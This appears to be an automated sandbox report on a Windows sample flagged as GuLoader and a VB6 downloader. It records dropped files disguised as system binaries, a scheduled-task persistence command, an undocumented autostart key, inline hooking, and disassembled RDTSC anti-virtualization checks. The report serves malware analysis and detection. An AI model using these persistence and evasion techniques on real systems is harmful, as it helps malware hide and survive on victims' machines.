Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: explorer.pdbUGP source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: os9tzxfmtz.exe , 0000001D.00000002.353360463.000000001E380000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: os9tzxfmtz.exe
Source:	Binary string: explorer.pdb source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: os9tzxfmtz.exe PID: 6280, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: os9tzxfmtz.exe PID: 6280, type: MEMORY

Source: explorer.exe.2.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x382ba
Source: stsys.exe.6.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3988e
Source: os9TZxfmTZ.exe	Static PE information: real checksum: 0x3b1c8 should be: 0x67a0c
Source: icsys.icn.exe.0.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x41d85
Source: spoolsv.exe.4.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x363c4
Source: svchost.exe.5.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x432a9
Source: mrsys.exe.4.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3b78a

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_00405A3F push ecx; ret
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0040715D push es; ret
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_004059E4 push ecx; ret
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_004059FB push ecx; ret
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_004059A0 push ecx; ret
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_004075BC push es; retf
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280076 push esp; iretd
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022800E3 push esp; iretd
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375F124 push 423E369Ah; iretd
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375B867 push edx; retf
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03761F6E push ds; ret
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760F6C push eax; ret
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760F02 push eax; ret
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760F0B push eax; ret
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03754FA6 push ebx; ret
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375A625 push ds; retf
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760EB5 push eax; ret
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3FD0D1 push ecx; ret

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Windows\System\spoolsv.exe	File created: C:\Windows\System\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\System\explorer.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\System\spoolsv.exe	Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System\svchost.exe	Executable created and started: c:\windows\system\spoolsv.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Executable created and started: c:\windows\system\explorer.exe
Source: C:\Windows\System\spoolsv.exe	Executable created and started: c:\windows\system\svchost.exe

Source: C:\Windows\System\spoolsv.exe	File created: C:\Windows\System\svchost.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Users\user\AppData\Roaming\mrsys.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\System\explorer.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\System\spoolsv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	File created: C:\Users\user\Desktop\os9tzxfmtz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	File created: C:\Users\user\AppData\Local\icsys.icn.exe	Jump to dropped file
Source: C:\Windows\System\svchost.exe	File created: C:\Users\user\AppData\Local\stsys.exe	Jump to dropped file

Source: C:\Windows\System\spoolsv.exe	File created: C:\Windows\System\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\System\explorer.exe	Jump to dropped file
Source: C:\Windows\System\explorer.exe	File created: C:\Windows\System\spoolsv.exe	Jump to dropped file

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

File created: C:\Users\user\Desktop\os9tzxfmtz.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\System\explorer.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath

Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\System\svchost.exe

Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe

Source: C:\Windows\System\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xED

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 000000000228872E second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007F6704C9B653h 0x00000022 call 00007F6704C9B5D8h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 00000000022887E6 second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F6704CA1D08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F6704CA1D2Eh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F6704CA1CB9h 0x00000033 test eax, edx 0x00000035 call 00007F6704CA1D93h 0x0000003a call 00007F6704CA1D18h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002280C26 second address: 0000000002280C26 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002283F33 second address: 0000000002283F33 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002283FF5 second address: 0000000002283FF5 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: os9tzxfmtz.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 000000000228872E second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007F6704C9B653h 0x00000022 call 00007F6704C9B5D8h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 00000000022887E6 second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F6704CA1D08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F6704CA1D2Eh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F6704CA1CB9h 0x00000033 test eax, edx 0x00000035 call 00007F6704CA1D93h 0x0000003a call 00007F6704CA1D18h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002288806 second address: 0000000002288806 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F6704C9BDCCh 0x0000001d popad 0x0000001e call 00007F6704C9B746h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002280C26 second address: 0000000002280C26 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002285908 second address: 0000000002284BD7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test cx, cx 0x0000000e ret 0x0000000f jmp 00007F6704C9B5EEh 0x00000011 cmp cx, bx 0x00000014 call 00007F6704C9E973h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f mov eax, dword ptr [eax+10h] 0x00000022 add eax, 40h 0x00000025 add eax, 04h 0x00000028 mov eax, dword ptr [eax] 0x0000002a ret 0x0000002b mov dword ptr [ebp+4Ch], eax 0x0000002e cmp ebx, ecx 0x00000030 call 00007F6704C9F07Ch 0x00000035 push dword ptr [ebp+20h] 0x00000038 pop dword ptr [ebp+0000012Ch] 0x0000003e mov dword ptr [ebp+68h], 00000000h 0x00000045 jmp 00007F6704C9C8F0h 0x0000004a call 00007F6704C9A2C9h 0x0000004f jmp 00007F6704C9B5F2h 0x00000051 pushad 0x00000052 mov edi, 00000036h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 000000000228A4D8 second address: 000000000228A4D8 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edx, dword ptr [ebp+44h] 0x00000006 jne 00007F6704CA1C85h 0x00000008 jmp 00007F6704CA1D2Eh 0x0000000a test edi, 9279C6F4h 0x00000010 sub edx, 04h 0x00000013 xor dword ptr [edx], ecx 0x00000015 jmp 00007F6704CA1D36h 0x00000017 pushad 0x00000018 mov edx, 000000C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002283F33 second address: 0000000002283F33 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002283FF5 second address: 0000000002283FF5 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000000568806 second address: 0000000000568806 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F6704C9BDCCh 0x0000001d popad 0x0000001e call 00007F6704C9B746h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000000565908 second address: 0000000000564BD7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test cx, cx 0x0000000e ret 0x0000000f jmp 00007F6704CA1D2Eh 0x00000011 cmp cx, bx 0x00000014 call 00007F6704CA50B3h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f mov eax, dword ptr [eax+10h] 0x00000022 add eax, 40h 0x00000025 add eax, 04h 0x00000028 mov eax, dword ptr [eax] 0x0000002a ret 0x0000002b mov dword ptr [ebp+4Ch], eax 0x0000002e cmp ebx, ecx 0x00000030 call 00007F6704CA57BCh 0x00000035 push dword ptr [ebp+20h] 0x00000038 pop dword ptr [ebp+0000012Ch] 0x0000003e mov dword ptr [ebp+68h], 00000000h 0x00000045 jmp 00007F6704CA3030h 0x0000004a call 00007F6704CA0A09h 0x0000004f jmp 00007F6704CA1D32h 0x00000051 pushad 0x00000052 mov edi, 00000036h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 000000000056A4D8 second address: 000000000056A4D8 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp edx, dword ptr [ebp+44h] 0x00000006 jne 00007F6704C9B545h 0x00000008 jmp 00007F6704C9B5EEh 0x0000000a test edi, 9279C6F4h 0x00000010 sub edx, 04h 0x00000013 xor dword ptr [edx], ecx 0x00000015 jmp 00007F6704C9B5F6h 0x00000017 pushad 0x00000018 mov edx, 000000C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\System\svchost.exe

